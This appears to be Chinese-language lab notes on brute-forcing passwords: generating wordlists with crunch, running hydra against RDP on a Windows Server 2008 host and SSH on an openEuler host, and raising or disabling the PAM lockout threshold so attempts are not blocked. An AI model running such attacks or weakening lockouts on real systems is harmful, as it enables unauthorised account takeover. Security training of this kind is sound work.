hydra(海德拉)暴力破解工具

暴力破解是指针对目标，反复猜测其密码或用户名的攻击行为。理论上所有的密码
都可以使用暴力破解，但是越复杂的密码需要的时间越长

  1、crunch密码字典

  基本用法：
     crunch  最小长度 最大长度  素材字符
      @--->代表小写字母
      ,--->代表大写字母
      %--->代表数字
      ^--->代表标点及特殊符合    

 
如： 生成一个纯数字的密码
    crunch  6 6 0123456789
    crunch  6 6 0123456789  -o  pass1.txt  保存到某个文件
    crunch  6 6 abc1234567890  -o  pass2.txt  保存到某个文件

案例1：破解win2008  密码：bdqn.cn123 10位
  crunch  10 10 -t @@@@^@@%%% -o win8.txt  文件内容太大
  
1. crunch  10 10 -t  密码匹配  -o win8.txt
hydra暴力破解：
  hydra：海德拉
    一款功能强大的开源密码攻击工具，支持多种协议的破解
基本用法：
   hydra -l 用户名 -P 密码字典文件  目标地址  服务类型
   常见的选项：
     -l：指定用户名
     -P：密码字典文件
     -L：指定用户名字典
     -t: 同时运行的线程数 默认16
1、破解win-sever2008  
┌──(root㉿kali)-[~]
└─# hydra -l Administrator  -P  win8.txt  192.168.100.144 rdp
kali远程登录win2008： rdesktop  192.168.100.144   
   
2、破解openEuler：
 crunch  10 10 %%%%%@@%%%  -o  linux.txt
 ┌──(root㉿kali)-[~]
└─# hydra -l root  -P  linux.txt  192.168.100.142 ssh 
 openEuler下pam.d配置文件中默认设置了登录次数，每次限制3次，
 每次限制时间为60秒  
 2.1修改 /etc/pam.d/password-auth文件
     deny=3数字调大，或者设置为0
      deny=3: 用户连续登录失败次数超过3次就被锁定     
  确定ssh服务是开启的： systemctl  start sshd